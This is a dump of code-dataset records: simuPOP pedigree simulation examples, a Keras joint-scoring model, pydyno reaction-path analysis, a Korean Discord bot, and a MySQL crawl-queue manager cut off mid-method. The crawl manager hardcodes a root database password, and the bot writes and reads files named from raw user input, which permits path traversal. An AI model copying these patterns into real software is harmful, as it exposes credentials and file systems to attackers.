Note that we do not need\n# population structure because PedigreeMating disregards population structure.\npop = sim.Population(size=len(IDs), loci=1000, infoFields='ind_id')\n# manually initialize ID and sex\nsim.initInfo(pop, IDs, infoFields='ind_id')\nsim.initSex(pop, sex=sex)\npop.evolve(\n    initOps=sim.InitGenotype(freq=[0.4, 0.6]),\n    # we do not need migration, or set number of offspring,\n    # or demographic model, but we do need a genotype transmitter\n    matingScheme=sim.PedigreeMating(ped, \n        ops=sim.MendelianGenoTransmitter()),\n    gen=100\n)\n# let us compare the pedigree and the population object\nprint(ped.indInfo('ind_id')[:5])\nprint(pop.indInfo('ind_id')[:5])\nprint([ped.individual(x).sex() for x in range(5)])\nprint([pop.individual(x).sex() for x in range(5)])\nprint(ped.subPopSizes())\nprint(pop.subPopSizes())\n#end_file\n\n\n#begin_file log/pedigreeMatingAgeStructured.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nimport random\nN = 10000\npop = sim.Population(N, infoFields=['age', 'ind_id', 'father_id', 'mother_id'])\n# we simulate age 0, 1, 2, 3 \npop.setVirtualSplitter(sim.InfoSplitter(field='age', values=[0, 1, 2, 3]))\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        # randomly assign age\n        sim.InitInfo(lambda: random.randint(0, 3), infoFields='age'),\n        # random genotype\n        sim.InitGenotype(freq=[0.5, 0.5]),\n        # assign a unique ID to everyone.\n        sim.IdTagger(),\n    ],\n    # increase the age of everyone by 1 before mating.\n    preOps=sim.InfoExec('age += 1'),\n    matingScheme=sim.HeteroMating([\n        # age 1, 2 will be copied\n        sim.CloneMating(\n            ops=[\n                # This will set offspring ID\n                sim.CloneGenoTransmitter(),\n                # new ID for offspring in order to track pedigree\n                sim.IdTagger(),\n                # both offspring and parental IDs will be the same\n                sim.PedigreeTagger(output='>>structured.ped'),\n            ],\n            subPops=[(0,1), (0,2)],\n            weight=-1\n        ),\n        # age 2 produces offspring\n        sim.RandomMating(\n            ops=[\n                # new ID for offspring\n                sim.IdTagger(),\n                # record complete pedigree\n                sim.PedigreeTagger(output='>>structured.ped'),\n                sim.MendelianGenoTransmitter(),   # transmit genotype\n            ],\n            subPops=[(0,2)]\n        )]\n    ),\n    gen=20\n)\n\n# use a pedigree object recovered from a file saved by operator PedigreeTagger\nped = sim.loadPedigree('structured.ped')\n# create a topmost population, but we do not need all of them\n# so we record only used individuals\nIDs = [x.ind_id for x in ped.allIndividuals(ancGens=ped.ancestralGens())]\nsex = [x.sex() for x in ped.allIndividuals(ancGens=ped.ancestralGens())]\n# create a population, this time with genotype. 
Note that we do not need\n# population structure because PedigreeMating disregards population structure.\npop = sim.Population(size=len(IDs), loci=1000, infoFields='ind_id')\n# manually initialize ID and sex\nsim.initInfo(pop, IDs, infoFields='ind_id')\nsim.initSex(pop, sex=sex)\npop.evolve(\n    initOps=sim.InitGenotype(freq=[0.4, 0.6]),\n    # we do not need migration, or set number of offspring,\n    # or demographic model, but we do need a genotype transmitter\n    matingScheme=sim.PedigreeMating(ped, \n        ops=sim.IfElse(lambda mom: mom is None,\n                sim.CloneGenoTransmitter(),\n                sim.MendelianGenoTransmitter())\n    ),\n    gen=100\n)\n# \nprint(pop.indInfo('ind_id')[:5])\nprint([pop.individual(x).sex() for x in range(5)])\n# The pedigree object does not have population structure\nprint(pop.subPopSizes())\n#begin_ignore\nimport os\nos.remove('structured.ped')\n#end_ignore\n#end_file\n","repo_name":"BoPeng/simuPOP","sub_path":"doc/userGuide.py","file_name":"userGuide.py","file_ext":"py","file_size_in_byte":196042,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"34"}
{"seq_id":"40590987133","text":"import tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras_adamw import AdamW\r\n\r\ndef get_feet_model(base_model_joints_loc):\r\n\r\n    base_model_joints = keras.models.load_model(base_model_joints_loc, compile = False)\r\n    base_model_joints_no_dense = keras.models.Model(base_model_joints.inputs, base_model_joints.layers[-14].output) \r\n    base_model_joints_no_dense.trainable = False\r\n\r\n    inputs = []\r\n    for i in range(6):\r\n        inputs.append(keras.layers.Input(shape=(224,224,1)))\r\n    outs = []\r\n    for i in range(6):\r\n        outs.append(base_model_joints_no_dense(inputs[i]))\r\n\r\n    pred = keras.layers.Concatenate()(outs)\r\n    pred = keras.layers.Dense(1024, activation = \"relu\")(pred)\r\n    pred = keras.layers.BatchNormalization()(pred)\r\n    pred = keras.layers.Dropout(0.5)(pred)\r\n    pred = keras.layers.Dense(512, activation = \"relu\")(pred)\r\n    pred = keras.layers.BatchNormalization()(pred)\r\n    pred = keras.layers.Dropout(0.5)(pred)\r\n    pred = keras.layers.Dense(1)(pred)\r\n\r\n    combined_model = keras.models.Model(inputs=inputs, outputs=[pred])\r\n\r\n    combined_model.compile(optimizer = _get_optimizer(), loss = \"mean_absolute_error\", metrics = [\"mae\"])\r\n\r\n    return combined_model\r\n\r\n\r\ndef get_hand_model(base_model_joints_loc, base_model_wrist_loc, erosion_flag = False):\r\n\r\n    individual_model_joints = keras.models.load_model(base_model_joints_loc, compile = False)\r\n    individual_model_joints_no_dense = keras.models.Model(individual_model_joints.inputs, individual_model_joints.layers[-14].output) \r\n    individual_model_joints_no_dense.trainable = False\r\n    individual_model_wrist = keras.models.load_model(base_model_wrist_loc, compile = False)\r\n    individual_model_wrist_no_dense = keras.models.Model(individual_model_wrist.inputs, individual_model_wrist.layers[-14].output) \r\n    individual_model_wrist_no_dense.trainable = False\r\n\r\n    inputs = []\r\n    if erosion_flag:\r\n        n_joints = 10\r\n    else:\r\n        n_joints = 9\r\n\r\n    for i in range(n_joints + 1):\r\n        inputs.append(keras.layers.Input(shape=(224,224,1)))\r\n    outs = []\r\n    for i in range(n_joints):\r\n        outs.append(individual_model_joints_no_dense(inputs[i]))\r\n    outs.append(individual_model_wrist_no_dense(inputs[-1]))\r\n\r\n    pred = keras.layers.Concatenate()(outs)\r\n    pred = keras.layers.Dense(1024, activation = \"relu\")(pred)\r\n    pred = keras.layers.BatchNormalization()(pred)\r\n    pred = 
keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(512, activation = \"relu\")(pred)\r\n pred = keras.layers.BatchNormalization()(pred)\r\n pred = keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(1)(pred)\r\n\r\n combined_model = keras.models.Model(inputs=inputs, outputs=[pred])\r\n\r\n combined_model.compile(optimizer = _get_optimizer(), loss = \"mean_absolute_error\", metrics = [\"mae\"])\r\n\r\n return combined_model\r\n\r\n\r\ndef _get_optimizer():\r\n\r\n # lr_decayed_fn = (\r\n # tf.keras.experimental.CosineDecay(initial_learning_rate = 3e-4,\r\n # decay_steps = 100*40,\r\n # alpha=1/3))\r\n\r\n # return keras.optimizers.SGD(learning_rate=lr_decayed_fn, momentum=0.9)\r\n\r\n return keras.optimizers.Adam()\r\n\r\ndef _get_adamW(model, epochs, steps):\r\n wd = 1e-6\r\n weight_decays = {}\r\n # Only layers with \"kernel\" need wd applied and don't apply WD to the output layer\r\n for layer in model.layers:\r\n if hasattr(layer, 'kernel'):\r\n layer.kernel_regularizer = keras.regularizers.l2(0)\r\n weight_decays.update({layer.kernel.name: wd})\r\n lr_multipliers = {'conv':0.2} \r\n optimizer = AdamW(lr = 3e-4, lr_multipliers = lr_multipliers, weight_decays = weight_decays, use_cosine_annealing = True, total_iterations = epochs * steps, init_verbose = False, batch_size = 1)\r\n return optimizer","repo_name":"ChenfuShi/RA2_alpine_lads","sub_path":"ra_joint_predictions/model/combined_sc1_model.py","file_name":"combined_sc1_model.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13848317164","text":"import re\nfrom functools import partial\nfrom concurrent.futures import ProcessPoolExecutor\nfrom pydyno.discretization.base import DomPath, _dominant_paths, _reencode_signatures_paths\nimport numpy as np\nimport networkx as nx\nfrom pysb.bng import generate_equations\nfrom pysb import Parameter\nfrom pysb.simulator.scipyode import SerialExecutor\nimport pandas as pd\nimport sympy\nimport pydyno.util as hf\nfrom pydyno.seqanalysis import SeqAnalysis\nfrom tqdm import tqdm\n\n\nclass PysbDomPath(DomPath):\n \"\"\"\n Obtain dominant paths from models encoded in the PySB format.\n\n Parameters\n ----------\n model: PySB model\n Model to analyze\n simulations: PySB SimulationResult object or str\n Simulations used to perform the analysis. 
If str it should be the\n filepath to a pysb simulation result in hdf5 format\n\n Examples\n --------\n Obtain the discretized trajectory of the extrinsic apoptosis reaction model\n\n >>> from pydyno.discretization import PysbDomPath\n >>> from pydyno.examples.earm.earm2_flat import model\n >>> from pysb.simulator import ScipyOdeSimulator\n >>> import numpy as np\n >>> tspan = np.linspace(0, 20000, 100)\n >>> # Simulate model\n >>> sim = ScipyOdeSimulator(model, tspan).run()\n >>> # Obtain dominant paths that consume species 37\n >>> dp = PysbDomPath(model=model, simulations=sim)\n >>> signs, paths = dp.get_path_signatures(target='s37', type_analysis='consumption', depth=5, dom_om=1)\n >>> print(signs.sequences.iloc[:, :5]) \\\n #doctest: +NORMALIZE_WHITESPACE\n\t\t 202.020203 404.040405 606.060608 808.080811 1010.101013\n seq_idx\tcount\n 0\t 1\t 8\t 8\t 8\t 8\t 8\n\n For further information on retrieving sequences from the ``SeqAnalysis``\n object returned by :func:`get_path_signatures`, see the examples under the\n :class:`pydyno.seqanalysis.SeqAnalysis` class.\n \"\"\"\n\n def __init__(self, model, simulations):\n super().__init__(model)\n self._trajectories, self._parameters, self._nsims, self._tspan = hf.get_simulations(simulations)\n self._par_name_idx = {j.name: i for i, j in enumerate(self.model.parameters)}\n generate_equations(self.model)\n\n @property\n def trajectories(self):\n return self._trajectories\n\n @property\n def parameters(self):\n return self._parameters\n\n @property\n def nsims(self):\n return self._nsims\n\n @property\n def tspan(self):\n return self._tspan\n\n @property\n def par_name_idx(self):\n return self._par_name_idx\n\n def create_bipartite_graph(self):\n \"\"\"\n Create bipartite graph with species and reaction nodes of the pysb model\n\n Returns\n -------\n nx.DiGraph\n a NetworkX directed graph\n \"\"\"\n graph = nx.DiGraph(name=self.model.name)\n for i, cp in enumerate(self.model.species):\n species_node = 's%d' % i\n slabel = re.sub(r'% ', r'%\\\\l', str(cp))\n slabel += '\\\\l'\n graph.add_node(species_node,\n label=slabel)\n for i, reaction in enumerate(self.model.reactions_bidirectional):\n reaction_node = 'r%d' % i\n graph.add_node(reaction_node,\n label=reaction_node)\n reactants = set(reaction['reactants'])\n products = set(reaction['products'])\n modifiers = reactants & products\n reactants = reactants - modifiers\n products = products - modifiers\n attr_reversible = {'dir': 'both', 'arrowtail': 'empty'} if reaction['reversible'] else {}\n for s in reactants:\n self.r_link(graph, s, i, **attr_reversible)\n for s in products:\n self.r_link(graph, s, i, _flip=True, **attr_reversible)\n for s in modifiers:\n self.r_link(graph, s, i, _flip=True, arrowhead=\"odiamond\")\n return graph\n\n @staticmethod\n def r_link(graph, s, r, **attrs):\n nodes = ('s%d' % s, 'r%d' % r)\n if attrs.get('_flip'):\n del attrs['_flip']\n nodes = reversed(nodes)\n attrs.setdefault('arrowhead', 'normal')\n graph.add_edge(*nodes, **attrs)\n\n def get_path_signatures(self, target, type_analysis, depth, dom_om,\n num_processors=1, sample_simulations=None):\n \"\"\"\n Obtain the dominant paths\n\n Parameters\n ----------\n target: str\n Species target. It has to be in a format `s1` where the number\n represents the species index\n type_analysis: str\n Type of analysis to perform. 
It can be `production` or `consumption`\n        depth: int\n            Depth of the traceback starting from the target species\n        dom_om: float\n            Order of magnitude to consider dominancy\n        num_processors: int\n            Number of cores to use in the function\n        sample_simulations: int\n            Number of simulations to use for the analysis\n\n        Returns\n        -------\n        pydyno.SeqAnalysis\n            Sequences of the discretized signatures\n        \"\"\"\n        if sample_simulations:\n            if isinstance(sample_simulations, int):\n                nsims = range(sample_simulations)\n            elif isinstance(sample_simulations, list):\n                nsims = sample_simulations\n            else:\n                raise TypeError('Sample method not supported')\n        else:\n            nsims = range(self.nsims)\n\n        network = self.create_bipartite_graph()\n\n        dom_path_partial = partial(dominant_paths_pysb, param_idx_dict=self.par_name_idx,\n                                   reactions_bidirectional=self.model.reactions_bidirectional, tspan=self.tspan,\n                                   network=network, target=target, type_analysis=type_analysis,\n                                   depth=depth, dom_om=dom_om)\n\n        pbar = tqdm(total=len(self.parameters))\n\n        def update(*a):\n            pbar.update()\n\n        with SerialExecutor() if num_processors == 1 else \\\n                ProcessPoolExecutor(max_workers=num_processors) as executor:\n            results = []\n            for args in zip(self.trajectories, self.parameters):\n                f = executor.submit(dom_path_partial, *args)\n                f.add_done_callback(update)\n                results.append(f)\n\n            try:\n                signatures_labels = [r.result() for r in results]\n            finally:\n                for r in results:\n                    r.cancel()\n\n        signatures = [0] * len(nsims)\n        labels = [0] * len(nsims)\n        for idx, sl in enumerate(signatures_labels):\n            signatures[idx] = sl[0]\n            labels[idx] = sl[1]\n        signatures_df, new_paths = _reencode_signatures_paths(signatures, labels, self.tspan)\n        # signatures_labels = {'signatures': signatures, 'labels': all_labels}\n        return SeqAnalysis(signatures_df, target), new_paths\n\n\ndef _calculate_pysb_expression(expr, trajectories, parameters, param_idx_dict):\n    \"\"\"Obtains simulated values of a pysb expression\"\"\"\n    expanded_expr = expr.expand_expr(expand_observables=True)\n    expr_variables = [atom for atom in expanded_expr.atoms(sympy.Symbol)]\n    args = [0] * len(expr_variables)\n    for idx2, va in enumerate(expr_variables):\n        # Getting species index\n        if str(va).startswith('__'):\n            sp_idx = int(''.join(filter(str.isdigit, str(va))))\n            args[idx2] = trajectories[:, :, sp_idx]\n        else:\n            par_values = parameters[:, param_idx_dict[va.name]]\n            args[idx2] = par_values.reshape((len(par_values), 1))\n\n    func = sympy.lambdify(expr_variables, expanded_expr, modules='numpy')\n    expr_value = func(*args)\n\n    return expr_value\n\n\ndef calculate_reaction_rate(rate_react, trajectories, parameters, param_idx_dict,\n                            changed_parameters=None, time_change=None):\n    \"\"\"\n    Get reaction rate values from simulated trajectories\n\n    Parameters\n    ----------\n    rate_react: sympy.Expr\n        Rate expression of a reaction\n    trajectories: np.ndarray\n        Simulated trajectories of the model species\n    parameters: np.ndarray\n        Parameter sets used to obtain the simulations\n    param_idx_dict: dict\n        Mapping from parameter names to their column indices in `parameters`\n    changed_parameters: np.ndarray, optional\n        Parameter sets that replace `parameters` from `time_change` onwards\n    time_change: int, optional\n        Index of the time point at which `changed_parameters` take effect\n\n    Returns\n    -------\n    np.ndarray\n        Reaction rate values at each time point\n    \"\"\"\n    variables = [atom for atom in rate_react.atoms(sympy.Symbol)]\n    args = [0] * len(variables)  # arguments to put in the lambdify function\n    for idx2, va in enumerate(variables):\n        # Getting species index\n        if str(va).startswith('__'):\n            sp_idx = int(''.join(filter(str.isdigit, str(va))))\n            args[idx2] = trajectories[:, :time_change, sp_idx]\n        elif isinstance(va, Parameter):\n            par_values = parameters[:, param_idx_dict[va.name]]\n            args[idx2] = par_values.reshape((len(par_values), 1))\n        else:\n            # Calculate expressions\n            args[idx2] = _calculate_pysb_expression(va, trajectories[:, :time_change, :], parameters, param_idx_dict)\n\n    func = sympy.lambdify(variables, 
rate_react, modules=dict(sqrt=np.lib.scimath.sqrt))\n    react_rate = func(*args)\n\n    if changed_parameters is not None and time_change is not None:\n        args = [0] * len(variables)  # arguments to put in the lambdify function\n        for idx2, va in enumerate(variables):\n            # Getting species index\n            if str(va).startswith('__'):\n                sp_idx = int(''.join(filter(str.isdigit, str(va))))\n                args[idx2] = trajectories[:, time_change:, sp_idx]\n            elif isinstance(va, Parameter):\n                par_values = changed_parameters[:, param_idx_dict[va.name]]\n                args[idx2] = par_values.reshape((len(par_values), 1))\n            else:\n                # Calculate expressions\n                args[idx2] = _calculate_pysb_expression(va, trajectories[:, time_change:, :], changed_parameters,\n                                                        param_idx_dict)\n\n        func = sympy.lambdify(variables, rate_react, modules=dict(sqrt=np.lib.scimath.sqrt))\n        react_rate2 = func(*args)\n        react_rate = np.concatenate((react_rate, react_rate2), axis=1)\n\n    return react_rate\n\n\ndef pysb_reaction_flux_df(reactions_bidirectional, trajectories, parameters, param_idx_dict, tspan):\n    \"\"\"\n    Create a pandas DataFrame with the reaction rate values at each time point\n\n    Parameters\n    ----------\n    reactions_bidirectional:\n        PySB bidirectional reactions\n    trajectories: np.ndarray\n        Simulated trajectories\n    parameters: np.ndarray\n        Parameters used to obtain the simulations\n    param_idx_dict: dict\n        Mapping from parameter names to their column indices in `parameters`\n    tspan: np.ndarray\n        Time span used in the simulations\n\n    Returns\n    -------\n    pandas.DataFrame\n        Dataframe with the reaction rate values of the simulations\n    \"\"\"\n\n    rxns_names = ['r{0}'.format(rxn) for rxn in range(len(reactions_bidirectional))]\n    rxns_df = pd.DataFrame(columns=tspan, index=rxns_names)\n\n    for idx, reac in enumerate(reactions_bidirectional):\n        react_rate = calculate_reaction_rate(reac['rate'], trajectories, parameters, param_idx_dict)\n        rxns_df.loc['r{0}'.format(idx)] = react_rate\n    rxns_df['Total'] = rxns_df.sum(axis=1)\n    return rxns_df\n\n\ndef dominant_paths_pysb(trajectories, parameters, param_idx_dict, reactions_bidirectional, tspan,\n                        type_analysis, network, target, depth, dom_om):\n    rxns_df = pysb_reaction_flux_df(reactions_bidirectional, trajectories[np.newaxis, :, :], parameters[np.newaxis, :],\n                                    param_idx_dict, tspan)\n    dom_paths = _dominant_paths(rxns_df, network, tspan, target, type_analysis, depth, dom_om)\n    return dom_paths\n","repo_name":"LoLab-MSM/pydyno","sub_path":"pydyno/discretization/pysb_discretize.py","file_name":"pysb_discretize.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"}
{"seq_id":"16512146113","text":"# Work with Python 3.8\nimport asyncio\nimport discord\nimport random\nimport requests\nimport datetime\nimport openpyxl\nfrom discord.ext import commands\nimport os\n\nintents = discord.Intents.all()\ngame = discord.Game(\"^^도움말을 입력해주세요.\")\nbot = commands.Bot(command_prefix='^^', status=discord.Status.online, activity=game, help_command=None, intents=intents)\nfr = \"^^\"\n\n@bot.event\nasync def on_ready():\n    print('다음 봇으로 연결됨:')\n    print(bot.user.name)\n    print(bot.user.id)\n    print('Connected')\n    serverlist = []\n    memberlist = []\n    for guild in bot.guilds:\n        serverlist.append(\"**\" + str(guild.name) + \"**`(\" + str(guild.id) + \")`\")\n        for i in guild.members:\n            if i not in memberlist:\n                memberlist.append(i)\n    while True:\n        await bot.change_presence(activity=discord.Game(\"^^도움말을 입력해주세요.\"), status=discord.Status.online)\n        await asyncio.sleep(5)\n        await bot.change_presence(activity=discord.Game(str(len(serverlist)) + \"개의 서버\"), 
status=discord.Status.online))\n await asyncio.sleep(5)\n await bot.change_presence(activity=discord.Game(str(len(memberlist)) + \"명의 사용자\", status=discord.Status.online))\n await asyncio.sleep(5)\n \n\n@bot.command(pass_context = True)\nasync def 주사위(ctx):\n randomNum = random.randrange(1, 7)\n if randomNum == 1:\n consequence = discord.Embed(description = ':game_die: ' + ':one:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 2:\n consequence = discord.Embed(description = ':game_die: ' + ':two:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 3:\n consequence = discord.Embed(description = ':game_die: ' + ':three:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 4:\n consequence = discord.Embed(description = ':game_die: ' + ':four:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 5:\n consequence = discord.Embed(description = ':game_die: ' + ':five:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 6:\n consequence = discord.Embed(description = ':game_die: ' + ':six:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"도움\") \nasync def 도움(ctx, arg):\n if arg == \"기타\":\n consequence = discord.Embed(title = 'C-5 기타 도움말', description = '**^^주사위**: C-5가 주사위를 던집니다.' + \n '\\n**^^멈뭄미/엉엉이**: 모든 ㅇ/ㅁ을 ㅁ/ㅇ으로 바꿉니다.' + \n '\\n**^^앵무새**: 말을 따라합니다.' + \n '\\n**^^병든앵무새**: 말을 이상하게 따라합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n if arg == \"기본\":\n consequence = discord.Embed(title = 'C-5 기본 도움말', description = '**^^핑**: 핑을 알려줍니다.(ms)\\n**^^계산**: 식을 계산합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n if arg == \"계산\":\n consequence = discord.Embed(title = 'C-5 계산 도움말', description = '1. 지수는 ^로 표기하세요.(예: 2^3)\\n2. 루트(제곱근)은 sqrt(n)으로 표기하세요.(예: sqrt(144))\\n3. 변수가 숫자가 아닐 때에는 x나 y를 사용해야 합니다.\\n4. 로그(log)는 log(n)으로 표기하세요.(예: log(100))\\n5. 오일러 상수(자연로그의 밑)은 e로 표기하세요.(예: 5e)\\n6. 
기타: π는 pi로(예: 2*pi) 표기하세요.(ln은 지원하지 않습니다)', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n@bot.command(\"도움말\")\nasync def 도움말(ctx):\n consequence = discord.Embed(title = 'C-5 도움말', description = '**^^도움 기본**: 기본 도움말을 표시합니다.\\n**^^도움 관리**: 관리 도움말을 표시합니다.\\n**^^도움 기타**: 기타 도움말을 표시합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n@bot.command(\"버전\")\nasync def 버전(ctx):\n consequence = discord.Embed(title = 'C-5 버전: 1.6.2', description = 'Typhoon Code: Danas', color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"서버\")\nasync def 서버(ctx, arg):\n if arg == \"목록\":\n list = []\n for guild in bot.guilds:\n list.append(guild.name)\n consequence = discord.Embed(title = 'C-5 서버 목록', description = '\\n\\n'.join(list) + \"\", color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"배워\")\nasync def 배워(ctx, *, arg):\n text = arg\n st = text.split(' ')\n wd = st[0]\n del st[0]\n pmn = st\n mn = \" \".join(pmn)\n if(os.path.isfile(\"C:/Users/user/Desktop/Bot_Dictionary/\" + wd + \".txt\")):\n await ctx.send(\"이미 배운 단어입니다.\")\n return\n else:\n f = open(\"C:/Users/user/Desktop/Bot_Dictionary/\" + wd + \".txt\", \"w\")\n f.write(mn + \"\\n```\" + str(ctx.author) + \" 님이 알려주셨어요!```\")\n f.close()\n await ctx.send(\"단어 \" + wd + \"을(를) 배웠습니다.\")\n return\n\n@bot.command(\"단어\")\nasync def 단어(ctx, *, arg):\n try:\n text = arg\n if(os.path.isfile(\"C:/Users/user/Desktop/Bot_Dictionary/\" + text + \".txt\")):\n f = open(\"C:/Users/user/Desktop/Bot_Dictionary/\" + text + \".txt\", \"r\")\n daneo = f.read()\n f.close()\n await ctx.send(daneo)\n return\n else:\n await ctx.send(\"그게 뭔지 잘 모르겠어요...\")\n return\n except Exception as WASANS:\n await ctx.send(\"오류가 발생했습니다.\\n`\" + str(WASANS) + \"`\")\n \n@bot.command(\"핑\")\nasync def 핑(ctx):\n await ctx.send(f'퐁! {round(bot.latency * 1000)} ms')\n\n@bot.command(\"먹어\")\nasync def 먹어(ctx, *, arg):\n reac = ['*냠냠*', ctx.author.mention + '님, 이걸 먹으라고 주셨어요??', '*(쿰척쿰척)*', '어...갑자기 배불러요 :grinning:', '저기...혹시 드셔보신 건가요?', '**카악 퉷**', '저 급한 약속이 생겼어요! 
못 먹어서 죄송해요 ㅎㅎ']\n    csq = random.choice(reac)\n    await ctx.send(\"음식:`\" + str(arg) + \"`\\n\" + str(csq))\n\n@bot.command(\"공지\")\nasync def 공지(ctx, *, arg):\n    channellist = [659072637569597482, 656882081946927166, 634344375845126154]\n    # iterate over the channel ids directly; the original counter skipped the first channel\n    # and indexed past the end of the list\n    for channel_id in channellist:\n        channel = bot.get_channel(channel_id)\n        if channel:\n            embed = discord.Embed(title = 'C-5 공지', description = arg, color = (0xFF6060))\n            await channel.send(embed = embed)\n\n@bot.listen()\nasync def on_message(message):\n    if message.author.bot:\n        return None\n    if message.content.startswith(\"\") and message.author.id != 589471081354494012:\n        file = openpyxl.load_workbook(\"레벨.xlsx\")\n        sheet = file.active\n        exp = [100, 300, 600, 1000, 1500, 2100, 2800, 3600, 4500, 5500, 7000, 10000, 15000, 22500, 35000, 99999]\n        i = 1\n        while True:\n            if sheet[\"A\" + str(i)].value == str(message.author.id):\n                sheet[\"B\" + str(i)].value = sheet[\"B\" + str(i)].value + 4\n                if sheet[\"B\" + str(i)].value >= exp[sheet[\"C\" + str(i)].value]:\n                    sheet[\"C\" + str(i)].value = sheet[\"C\" + str(i)].value + 1\n                    embed = discord.Embed(title = ':arrow_up:Level Up!', description = '현재 레벨: ' + str(sheet[\"C\" + str(i)].value) + '\\n현재 경험치: ' + str(sheet[\"B\" + str(i)].value))\n                    await message.channel.send(embed = embed)\n                # persist and stop once the author's row has been handled\n                file.save(\"레벨.xlsx\")\n                break\n\n            # empty row reached: register the author, save, and stop\n            if sheet[\"A\" + str(i)].value is None:\n                sheet[\"A\" + str(i)].value = str(message.author.id)\n                sheet[\"B\" + str(i)].value = 0\n                sheet[\"C\" + str(i)].value = 1\n                file.save(\"레벨.xlsx\")\n                break\n\n            i += 1\n\n\n@bot.command(\"병든앵무새\")\nasync def 병든앵무새(ctx):\n    return\n\n@bot.command(\"앵무새\")\nasync def 앵무새(ctx, arg):\n    await ctx.send(arg)\n\n\nbot.run('Token')\n","repo_name":"TyphoonDANAS/C-5","sub_path":"C-5.py","file_name":"C-5.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"17857517247","text":"from wordPair import WordPair\n\nclass Combinator:\n    def __init__(self, cb):\n        self.cb = cb\n\n    get_indexes = lambda self, x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x == y]\n\n    def iterate(self, arr):\n        self.history = []\n        self.result = []\n        for index, entity in enumerate(arr):\n            for index2, entity2 in enumerate(arr):\n                if(index == index2):\n                    continue\n                wPair = WordPair(entity, entity2)\n                if(not self.get_indexes(wPair.name, self.history) and not self.get_indexes(wPair.reverseName, self.history)):\n                    self.result.append(self.cb(wPair))\n                    self.history.append(wPair.name)\n        return self.history\n","repo_name":"NoJuanNobody/crossword-scripts","sub_path":"combinator.py","file_name":"combinator.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"40462663374","text":"from twisted.enterprise import adbapi\nimport hashlib\nimport pymysql\n\n\nclass CrawlDatabaseManager:\n\n    DB_NAME = 'weibo_crawl'\n\n    SERVER_IP = 'localhost'\n\n    TABLES = {}\n    # create new table, using sql\n    TABLES['uids'] = (\n        '''CREATE TABLE `uids` (\n        `index` int(11) NOT NULL AUTO_INCREMENT,\n        `user_id` varchar(32) NOT NULL,\n        `status` varchar(11) NOT NULL DEFAULT 'new',\n        `queue_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n        `done_time` timestamp NOT NULL DEFAULT 0 ON UPDATE CURRENT_TIMESTAMP,\n        PRIMARY KEY (`index`)\n        ) ENGINE=InnoDB\n        charset=utf8mb4''')\n
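    # The 'status' column above drives the crawl queue: enqueue_user inserts rows as 'new',\n    # dequeue_user claims one row and marks it 'downloading', and finish_user marks it 'done'\n    # ('done_time' then updates automatically via the ON UPDATE clause).\n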
\n    TABLES['users'] = (\n        '''CREATE TABLE `users` (\n        `index` int(11) NOT NULL AUTO_INCREMENT,\n        `user_id` varchar(32) NOT NULL,\n        `name` varchar(32) NOT NULL,\n        `followers_count` int(11) NOT NULL,\n        `follow_count` int(32) NOT NULL,\n        `description` varchar(612) NOT NULL,\n        PRIMARY KEY (`index`),\n        UNIQUE KEY (`user_id`)\n        ) ENGINE=InnoDB\n        charset=utf8mb4''')\n\n    def __init__(self):\n        # connect mysql server\n        try:\n            cnx = pymysql.Connect(host=self.SERVER_IP, user='root', password='a19970507',charset=\"utf8\")\n        except pymysql.Error as err:\n            # pymysql exceptions carry the error number in args[0]\n            if err.args[0] == pymysql.constants.ER.ACCESS_DENIED_ERROR:\n                print(\"Something is wrong with your user name or password\")\n            else:\n                print('Create Error ' + str(err))\n\n        cursor = cnx.cursor()\n        # use database, create it if not exist\n        try:\n            cnx.select_db(self.DB_NAME)\n        except pymysql.Error as err:\n            # create database and table\n            self.create_database(cursor)\n            cnx.select_db(self.DB_NAME)\n            self.create_tables(cursor)\n            print(\"created database\")\n        finally:\n            cursor.close()\n            cnx.close()\n\n        dbconfig = {\n            \"database\": self.DB_NAME,\n            \"user\": \"root\",\n            \"password\": \"a19970507\",\n            \"host\": self.SERVER_IP,\n            \"charset\": \"utf8\"\n        }\n        self.cnxpool = adbapi.ConnectionPool('pymysql', **dbconfig)\n\n    # create database\n    def create_database(self, cursor):\n        try:\n            cursor.execute(\n                \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(self.DB_NAME))\n        except pymysql.Error as err:\n            print(\"Failed creating database: {}\".format(err))\n            exit(1)\n\n    def create_tables(self, cursor):\n        for name, ddl in self.TABLES.items():\n            try:\n                cursor.execute(ddl)\n                print('Tables created')\n            except pymysql.Error as err:\n                if err.args[0] == pymysql.constants.ER.TABLE_EXISTS_ERROR:\n                    print('create tables error ALREADY EXISTS')\n                else:\n                    print('create tables error ' + str(err))\n\n    # insert user into queue\n    def enqueue_user(self, user_id, **kwargs):\n        con = self.cnxpool.connect()\n        cursor = con.cursor()\n        